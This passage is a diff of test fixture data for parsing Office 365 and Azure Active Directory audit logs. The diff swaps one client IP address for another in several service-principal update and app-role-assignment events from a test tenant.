+ "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { @@ -20875,7 +20875,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -20905,9 +20905,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { @@ -21122,7 +21122,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -21152,9 +21152,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { @@ -21369,7 +21369,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 